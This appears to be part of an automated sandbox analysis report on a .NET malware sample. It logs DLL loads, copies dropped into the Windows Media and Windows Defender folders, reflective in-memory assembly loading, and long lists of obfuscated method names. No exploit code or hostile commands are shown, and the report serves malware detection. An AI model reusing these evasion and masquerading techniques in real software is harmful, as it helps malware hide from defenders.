Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3 Jump to behavior
Source: QT4aLb3P98.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: QT4aLb3P98.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: QT4aLb3P98.exe Static file information: File size 1170944 > 1048576
Source: QT4aLb3P98.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11a400
Source: QT4aLb3P98.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A System.AppDomain.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A System.Reflection.Assembly.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882BF8 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C38 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C58 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C48 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88DED8 pushfd ; retf 0_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2BF8 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C38 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C58 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C48 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8BDED8 pushfd ; retf 10_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88DED8 pushfd ; retf 11_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B8A6060 push ebx; retn 000Fh 11_2_00007FFD9B8A64AA
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B8A64CD push ebx; retn 000Fh 11_2_00007FFD9B8A64AA
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B882BE4 pushad ; retf 11_2_00007FFD9B882C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8BDED8 pushfd ; retf 12_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B2BE4 pushad ; retf 12_2_00007FFD9B8B2C61
Source: QT4aLb3P98.exe Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe.0.dr Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe0.0.dr Static PE information: section name: .text entropy: 6.880883233546267
Source: QT4aLb3P98.exe, JiKg8d856ZjYXmiBYFo.cs High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'SwirFUDDty', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: QT4aLb3P98.exe, w3475uuXHT35IaRI8Bu.cs High entropy of concatenated method names: 'R7E0qElHL3', 'ltf0OTpAca', 'UY1x80ByerrkSXqqZFE', 'yY0VUHB4NjScUJl9yke', 'zfPFaeBZsrtXtMlxiZv', 'Df9vawBrnViwCtIPRoF', 'jqpLBuBxw3jUF3BBGgm', 'JxsPH7BgMGa4aeDZs1B'
Source: QT4aLb3P98.exe, JIJKCDNsoUDMgsolyUG.cs High entropy of concatenated method names: 'F6LNTnKW5b', 'EbYebccaAvWCeMGmvkc', 'XPCvR0cFN8xYDhKGnmh', 'iBSuulcowVrlmXv4Wmu', 'u5dO5acmvKB2GesbLvx', 'lXg7ZCcOP1708CPovCp', 'SHqPFic1VvsblYS6DZV', 'G9mwHKchBTCpTr1MiWa', 'Qf6NnIMXY0', 'vKV1Zec5qmnjESYUbcK'
Source: QT4aLb3P98.exe, hctUYkuV0iFJ1dPM067.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'AHFuswBC7JI9bQC8Hb3', 'IVbojOBb50tB27FgGsg', 'C71ahJBkJA4Sa2KH54L', 'MdBNtfBS751QJJ6sKWn'
Source: QT4aLb3P98.exe, SbFE8PN0xa9wA4CIVcp.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'G4BjrVqqIuiUrQTMLHP', 'nZ5mZHqRF1J810eGQfx', 'GOci69q5XgwQU5WZ1uP', 'OUiwyrqcVEPMIrqQOlb', 'IEgBorqJTEBKBZSstEc', 'qsp177qjyyi0mCXy4gt'
Source: QT4aLb3P98.exe, HjgiARybfruwpinHKq.cs High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'XAAvUJDPE', 'NIa45Ca48CQerTx7N8X', 'AiavwmaxHv26R8OKBIF', 'naMuBUags9MmMq4KnG6', 'JLNCndatqAp2fjWc0Fq', 'VYSkpnaBnWYYbDJwVLg'
Source: QT4aLb3P98.exe, aYHCPhZ2Uteq2rb4lxv.cs High entropy of concatenated method names: 'exbtkwtG6L', 'VE4tc1QZot', 'KGBtzD5Fke', 'oyC8J2Bmrs', 'ft98NOFWHc', 'NfL8ZEYgBs', 'Rdj8uAQfX5', 'MS38t98a7m', 'IdQ888DTLj', 'auXM09SvKFWEOONbevW'
Source: QT4aLb3P98.exe, eaVHe48uTpqvepbPin2.cs High entropy of concatenated method names: 'YsY2PGKB7NlHCEsv8A0', 'UYd7TMKNu5CHhKIMUP0', 'h6EId6KgKviqG3aR6xm', 'iUj3BpKtyFhFjLItSPM', 'PVuMX6vFYJ', 'MlAZU1K0T6mAPeg2sWU', 'J6M2eFKfrcnmUgBhjj9', 'kW8wGAKEVI4eGb5UsTf', 'r7xAbMKnNJ4dApYh6k3', 'NM37oLKMlIXH0kYJoEC'
Source: QT4aLb3P98.exe, c1dZrVYZZmXaCgA8tdW.cs High entropy of concatenated method names: 'D0IAU3uo8W', 'fBSA0iLCHn', '_8r1', 'ROyA3RiFmK', 'RamAorlOOK', 'o9OAxuHAOW', 'BwaAmKnksn', 'AuvOgCHSVFqMS0Lmm2p', 'LxEoTDHZ11xsCNjl5Cg', 'uxQ6P3HrefskYwBEvQ4'
Source: QT4aLb3P98.exe, cIhUhU87xqoiS8aIYjc.cs High entropy of concatenated method names: 'ESnrtupts9', 'J2rr8wqf7x', 'tDZrY3oZ5U', 'CknrKOiUNG', 'LJirUlRH0F', 'dCBr0xFCQZ', 'ksXr34A2sJ', 'Qd3ro3xJg5', 'cRlrxuq8BE', 'JRdrmTR76k'
Source: QT4aLb3P98.exe, xlMfjjSlwWE9ZS9iFb.cs High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'zNLaO0OTT1F35TSI7MR', 'HbiapbOlMTG40aCihLe', 'Jf8vApO3PAKb1m5t7yo', 'f8Kja6OQRnKn4F1Mvse', 'yd2T92OY2DwaaDeOdlN', 'FWLOuNOuPWLHJ0cW4w7'
Source: QT4aLb3P98.exe, Qmn44TubyfFJgaNL5o4.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'q833o8IJJ6', 'eBmeY2LXm0', 'tCa3xAVYYG', 'JhZeasOJ6j', 'gQ3SZRNLl8obTFayyPk', 'kVGQygNACh7MShXhVbx', 'Ellj2MN6CE9Xt3pc9XG'
Source: QT4aLb3P98.exe, wACN0CtwSQcZB5NcoXm.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'ILGjlfSsWj', 'gpjjPb8lqt', 'r8j', 'LS1', '_55S'
Source: QT4aLb3P98.exe, PK7kftNRm6sY0anTonR.cs High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'RP0gA9JhmKLU0l7h8FZ', 'Metfq6Jqa9mr5N9DCHq', 'tSQ0yTJRL8gIBUlWY7O', 'n7BtnxJ5ha5N9lpE7Nu', 'ONoL61JODWwhfgkpyh4', 'BvRc4gJ1yBEsAXPmQhW'
Source: QT4aLb3P98.exe, DHbEZIdqePPmX1u5OH.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'e2oj2hF6gEVNvT9l6H4', 'lj7IawFDkiYRKDRlMTr', 'Br8rcZFLvKMu70urn7W', 'BAX2GoFAeSfxuWB4kXx', 'kDjyXSFHXsfIMawrSit', 'l6pDxVFpbqV3JnBDxmZ'
Source: QT4aLb3P98.exe, TPLV12KsWsYNV0yEvc.cs High entropy of concatenated method names: 'GV142sWsY', 'VvjKt7KvHN6ZwZZCyg', 'f3YXs5dSjyIM1N0hdX', 'g3oHmrwoOpDtfa41jy', 'MZyRYKGtwsGCYyB3DP', 'oOfBX9VgvFysdw0vuD', 'txRZhWtsU', 'WoAuTJMAI', 'IQEtMG9GI', 'pch8Apg3T'
Source: QT4aLb3P98.exe, IvZRi0uWrrwg1ss7Eej.cs High entropy of concatenated method names: 'HEHU9bKEg2', 'MFZUCj7eOb', 'j2NU7ot0Et', 'qPOUfUGhru', 'jCKU5RBIwy', 'xKNvcithiiegC6GhgLL', 'AHgp6rtq42Im1Hbg3Wa', 'sMIaWBtOedUeBSwmfWO', 'CyEghpt1VRyOr0nESe3', 'q7X3BZtRWyBYOXRJKn8'
Source: QT4aLb3P98.exe, hPlDc6ter0qURk0qvlE.cs High entropy of concatenated method names: 'kEgmOfeimH', 'sSKmLKd8pv', 'LIfmgT23yD', 'KxPmaQgugU', 'BLhmdIXaGy', 'tID95Z0VUfXxSLGpXNY', 'F4Egmi06BqBHlwWgylV', 'gpjKvi0K49pIWclsABd', 'osv8g80Gr14fii6cgHr', 'Fke1O10D8vmgZEEJvZa'
Source: QT4aLb3P98.exe, XrrMhMtogEHbKEg2iFZ.cs High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: QT4aLb3P98.exe, ekZ8mjNbGSW36MJaG8q.cs High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GxvLlIJw4xY94CI5AMP', 'lKidG9JKQnIhG6jiqqy', 'NE42s7JGToxvB2hF5xw', 'tWHpG8JVRidcPW7Djv3', 'K7K50LJ6AlLi2vAMN8E', 'Lqiyf7JDc39FgnXvq1Z'
Source: QT4aLb3P98.exe, bgb94uut44YRypTwclP.cs High entropy of concatenated method names: 'JRVKQ0SjD5', 'ICwKiNdLXI', 'KMqKRcFbPw', 'O4TKTTr5SI', 'kGQKSlOAlQ', 'aP1KnrtS3c', 'pFht6j4sn6jSD4P2Nsy', 'EDGHhL4fHnDOnvE62rt', 't7SHNP4Mn40F4k7twRL', 'zXd8XV488k5fDDZLa7G'
Source: QT4aLb3P98.exe, anDRYVYaCLiATfjJN2T.cs High entropy of concatenated method names: 'qn92dA7LCH', 'NPWk2RT89Wugw01eHW6', 'cQBClqTd5FdOFX1g2Z8', 'dYl1pBTMDbpSaNfNZ1M', 'BKTimpTsafjkWKtOE9S', '_1fi', 'WYmEb70VkV', '_676', 'IG9', 'mdP'
Source: QT4aLb3P98.exe, eUinWT80SP8jAc4PmKc.cs High entropy of concatenated method names: 'nILXMwSYrg', 'lE4XeSErdq', 'XinI43690uCFvWKGqNF', 'N5BOjn6vTGQ8SWDYnx8', 'jFLDde6XxXM0MetdI0j', 'eLQFOm62lA5UTPEXJlA', 'a70my16IcDkHfFn43kU', 'jBPawF6iats3tAsJHfb', 'tWHwi46ziF2pu34voaP', 'uNmFb0DoRE4geX8py8o'
Source: QT4aLb3P98.exe, fVfh5iNIrUf9RmULaIe.cs High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xWp5T2JgnDhw3Dv7IXp', 'BZYJaXJtjP54Avrw1c8', 'IWPEQYJBRasIHFgtdqm', 'J1YRhyJN4XnPD7mDwyR', 'C3rLyqJEERfGiCyo1B1', 'qWMniFJntkKhBcnpXXM'
Source: QT4aLb3P98.exe, LxYlj3vH5GsIITGLXr.cs High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'naEyV9FXBE9mvyg3DG6', 'drDEFAF2VLsrbAON8VL', 'qhslstFIT8FfFyYshWl', 'NhhPt1FiWMTm0dmDcHr', 'jXAV8qFzqC2F7oBpxmu', 'REiO8ROoTpVH7454RB3'
Source: QT4aLb3P98.exe, lXPIdukwBEmOeLRYpZ.cs High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'HBQJ5g19GipCURitN9l', 'qWdSYU1vqH9TAeu14HM', 'A3PyRD1X3cTT7ljVKUK', 'B0oqGX12xRdA99GYqY6', 'UHIiFk1IVO7rUDqjMdg', 'aBkRSQ1i1pXXEgjLO3F'
Source: QT4aLb3P98.exe, mULMhNufXNK1yc83sXD.cs High entropy of concatenated method names: 'vUGvdkEDntNVJTgIuSJ', 'iFOJ28ELLXClgfRTBCn', 'abJ1adEVYRAJAsMkkJW', 'pvPRYbE6OSFgjLN0BEd', 'IWF', 'j72', 'YoX36m7dj3', 'nfP3WMx0u6', 'j4z', 'tba3GaUq5G'
Source: QT4aLb3P98.exe, Erf1E78qftSV13mX0mt.cs High entropy of concatenated method names: 'c9TX975iQs', 'yWnXCBkB0s', 'zl3X7fqqtD', 'NeJXfkprFk', 'nBIX5IHDC9', 'ePlXkPMOk8', 'ecgXDjDYqojt1H0h0Kl', 'numLP5D32ZUt8EBmMv1', 'oQD68ODQ8jKKpbITvw6', 'llZak2Dub7GSeApx6Xq'
Source: QT4aLb3P98.exe, btrm2uNF4PVTMitAF2X.cs High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'VKMAssRVim2WfySjIPo', 'QbovDqR6c7tU8DguQcF', 'bwSPCCRDYFPSSXUlu0Q', 'vdEKDNRLrLpXZbUKrZs', 'xOtbJDRAJ600rKiCRyt', 'r7ItIeRHUmXvoII3V8B'
Source: QT4aLb3P98.exe, Fsxaj0uzX7hKAF68yg2.cs High entropy of concatenated method names: 'U3h3Ejm3wW', 'XP732cKfE0', 'syw3DAJhFP', 'vhtUtiEpYr0474ZUveg', 'N5kU8AEWKqWNxx5SKAW', 'rdlwbpEAeaaANcT6BTN', 'yfwTniEHojTejT9Psvw', 'SZdXxZETLU3Ma9efsmY', 'uqrSXCEl8CMT6cwQ2PD', 'Gh1V5NE31mxnXG6IBT5'
Source: QT4aLb3P98.exe, epvhIfYFT23yDvxPQgu.cs High entropy of concatenated method names: 'IGD', 'CV5', 'JIJAXSaRO2', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: QT4aLb3P98.exe, lTgdv7YwVg2BDbsrn0n.cs High entropy of concatenated method names: 'QjoD1JpUk3', '_1kO', '_9v4', '_294', 'yyCDF6qwp6', 'euj', 'fNSDXn1mGO', 'kvuDrEdbJG', 'o87', 'VV0DAPWMIe'
Source: QT4aLb3P98.exe, OllUQkCS5lChLlrMeM.cs High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'LoLlrX1MtulH5sDgx7Y', 'MIbn8U1sOpZgk9thpkC', 'zyFytU18LMc7ppHn3fP', 'gY02ib1dtW6a70yixn8', 'VrAHTm1wIXDy7CAqbMa', 'HNmdpA1KmiQqVwHpnan'
Source: QT4aLb3P98.exe, D78IJCtHbCVIvq91AqO.cs High entropy of concatenated method names: 'rDE4OtfGZE', 'hEU4LsBG9L', 'iqU4gyYuu5', 'Y4R4aZ0ayU', 'OCt4d0fmwE', 'VxRG3gf4ucGd9ixii8N', 'jApMGafrivaPTJOwCZV', 'mTcMogfy7hN4KaQ3pNt', 'gfDxCFfxkgAsRfhIKoG', 'dIkaq7fgsIJYYTOotMJ'
Source: QT4aLb3P98.exe, aYlFMtA7J7lhuQqVNI.cs High entropy of concatenated method names: 'sJqLxEdJs', 'eRogMy7No', 'OS1axE0sL', 'tEwFSsmLA9OEeX3Jnyi', 'X2id0xm6qdk5S8ZlLf8', 'mo72RJmD7Ib9GKgAKCv', 'nfXmIJmAr6d9deKIF6n', 'v5jUgQmHBBtvdDFOKnn', 'oo6n04mpkHpr6w1OBFD', 'rFUtBwmWjdrarjbHM5d'
Source: QT4aLb3P98.exe, flIc1DNoiBbuwmOx3RR.cs High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'FG1ySTq4AbR4yjuwjSS', 'GL6HiQqxBSEJguDJkcY', 'IVqarsqgwWNUtowjheL', 'bMFtsSqtFUEHWqGXILT', 'ajUXraqB8Lleu9cd5P6', 'qkaK4mqNAJ9mNE8D7AH'
Source: QT4aLb3P98.exe, cHId7LZdHVnAfl0FcpK.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', 'MRp8LN7Wdx', 'aTi8gguHId', 'VLH8aVnAfl', 'iFc8dpKnZk', 'mtU8BDKisy', 'F5X1kUr5s4MITaGPBRS', 'WhxnLorcPnkPyqs192E', 'liyTLnrqPLaWWtYBs40'
Source: QT4aLb3P98.exe, WqtexeZGiSmtsK7qtqT.cs High entropy of concatenated method names: 'Lmwuz8UT4S', 'AMVtJ6NEal', 'mIltNaHcxG', 'WcotZnPkrJ', 'xpftuaAULj', 'aqNttOLJn1', 'AnSt8VkIw5', 'BBqtYKI0mq', 'IT5tKkIn05', 'ChmtUZCCsh'
Source: QT4aLb3P98.exe, ja2QmeuPAK3mjTlXN6X.cs High entropy of concatenated method names: 'sG4UIjXAFB', 'xwsUwAuaHw', 'aKkUbrrMhM', 'Ip5Y7jg3EJ5Etq0yfVB', 'IYC46DgQO3S3vQAMfMb', 'NInGwVgYW3ZFStY7BPh', 'bQoAQqguKcHMYsWcn0T', 'lKsdDLgUvgFmW9WUt5v', 'hjOFRRgef9esoFLywfx', 'TDlPb8gPHmn2URmt1TV'
Source: QT4aLb3P98.exe, nROr8kt8crAvlKUhJtl.cs High entropy of concatenated method names: 'iSIx6P1mhD', 'simOn6nyIWNx7uOeNox', 'kVGvdEn4P4621t26iLX', 'A7t5TKnZ25GOgkihLJQ', 'VHxIQFnrO0nM0gyEfJx', 'RMK3sdJ2mn', 'sJd3yreMct', 'GUA3qXD2Tr', 'tn63OKWOlk', 'cRp3LgulRG'
Source: QT4aLb3P98.exe, d5psnfb6IMXY04xdIE.cs High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Xg1GA51kASqd8asKLPl', 'J3oQXE1S3GEjT7T75j3', 'o85eri1ZNwZ2VangPtB', 'bdxSGd1rgT2mMv4j0sj', 'vWRPOO1y147qQtaYq6B', 'u76kZ7140j1f1anacQd'
Source: QT4aLb3P98.exe, YNpWMyYrp8jNaND6rmI.cs High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: QT4aLb3P98.exe, QKVeWAKoKtEC0ldLGfS.cs High entropy of concatenated method names: 'YFOK6QSSd2ZBt', 'reY0P63kRAv882lQSa1', 'HnLqEQ3SVuDxFunXX4b', 'UAhZmW3ZSK1negTYnu9', 'L30ejE3rSnrocmfpF2h', 'q5BEFV3yCtZ4rTQcGm6', 'EYEC073CquLytO4IkH6', 'mvy5kj3b7AfnKBxfuvN', 'GgURkJ34OS5US5gubR4', 'NSUv9q3xDFYVmi84hJm'
Source: QT4aLb3P98.exe, uHGDcoNLcVrF6ACGrOy.cs High entropy of concatenated method names: 'LLlNCrMeMx', 'F5ZWsecEMT7YiOYd0yH', 'MhWEMMcnqDsKwnRtpZF', 'sDxG7bcB2dp8PnDeHx6', 'enOqv4cN3GoToyB9Mc6', 'BbMkhJc0jjg8hRmFN1A', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: QT4aLb3P98.exe, OAr2scQ6RB0VjTKZBS.cs High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'XGwEU8OJlwUJ1e6J49q', 'D3voSdOjVb1Dl942GCn', 'AP2Hk0O7XkWMVmwhMNl', 'Ra6GNrOCIhcFP2a6vHC', 'zS2i7yObJtChuEGQkNV', 'lLmHJhOkx34RsnkSMe6'
Source: QT4aLb3P98.exe, yN60qAED4WdDCqN6RK.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'IM1v4FaJsUimr5Z9dJ7', 'NOoXUQajfAGIIwVI2MH', 'CknS7Qa7J0ij4kAQSlc', 'jYcTGxaCSx1IlDi9S1J', 'pSbq6oab276rTSQQ1T3', 'iN1TJEak29IFjH4ebCm'
Source: QT4aLb3P98.exe, JeiOSvYyXaCRGnCCUIu.cs High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'IekHrjWZsT', 'v92HA93EcX', 'KD6HHxlbkf', 'KSvHEgg9PI', 'alVH2TLGxf', 'NgyHDyVNlA', 'qIA8wvWDO9tAMW2xV9y'
Source: QT4aLb3P98.exe, dAxIURupZ07CRji9DC9.cs High entropy of concatenated method names: 'uds0l6kN0P', 'oDc0P6r0qU', 'Nk006qvlEu', 'yWQxeNtTWSe7ngbZgf2', 'KMfIo9tpLIaCg1nmm7a', 'MVEsUdtWFaapy3vsITH', 'pNxgTCtlEfIBO8r645n', 'nnp0YqlPrq', 'uiX0Keys5r', 'f670Ucyncw'
Source: QT4aLb3P98.exe, i09OH0N8VIih7ZUBEF0.cs High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'qi0BQWh36aCPfrtGI1n', 'palaQJhQsBt6RGHiCkp', 'vXorADhYqZ1u3VCYNcL', 'gg9eTQhuhXTh79Frhvk', 'dncmdahUa16gcd0V3Cd', 'WVoiUchepuEV7likLX3'
Source: QT4aLb3P98.exe, jsTLwvNKogX4E4jqVtA.cs High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'NUPCQbhvpZ86WXpJE5I', 'YClALkhXLH2f0k67p42', 'b4eFpeh2a8mapP5NRn3', 'YGGex9hIhfUFbl4BERr', 'pHJTWwhiKShstXMMAeU', 'aXCGw8hzaZZT4g1ENsc'
Source: QT4aLb3P98.exe, ooDekmYVetHhYPyRjWf.cs High entropy of concatenated method names: 'G7BAMbvn16', 'clpAeyNZ5A', 'cWyAVS43HT', 'DGRA1uh5nV', 'YHJAFo0BCc', 'ebAQMVH2RUu8Cq3kW4V', 'YZl1QwHI6gGc7Ffjohd', 'VF4nGhHiSRiZd6lNGjg', 'EK1ArZHzWWK6rf4sY4C', 'ubo4jApoObUM5MHNDID'
Source: QT4aLb3P98.exe, OMKN0kN27P6tRpJvd7F.cs High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'Q8VWtD56D32wXKTanhQ', 'Vg5Qn05DjKdlI0g2A8a', 'p9piLA5LYISu3yZKtrO', 'QBAk8c5AfZ3mXoN9BZt', 'XCv1i65H0OpiwKUbnP7', 'MflvNd5pKXQABlH3JIk'
Source: QT4aLb3P98.exe, CUBuDgYOrYnenlHHOMH.cs High entropy of concatenated method names: 'ihsEPbTOt2CS9P6SAXt', 'yhPBHwT1NIlRDqmluKm', 'jx26qcTaEWTqWDxdlgZ', 'hYxvPXTFfwh9JilcbUo', 'KwaHLCnvTv', 'WM4', '_499', 'zFuHgIyI17', 'mWaHaWbbtf', 'WcLHdVm30Q'
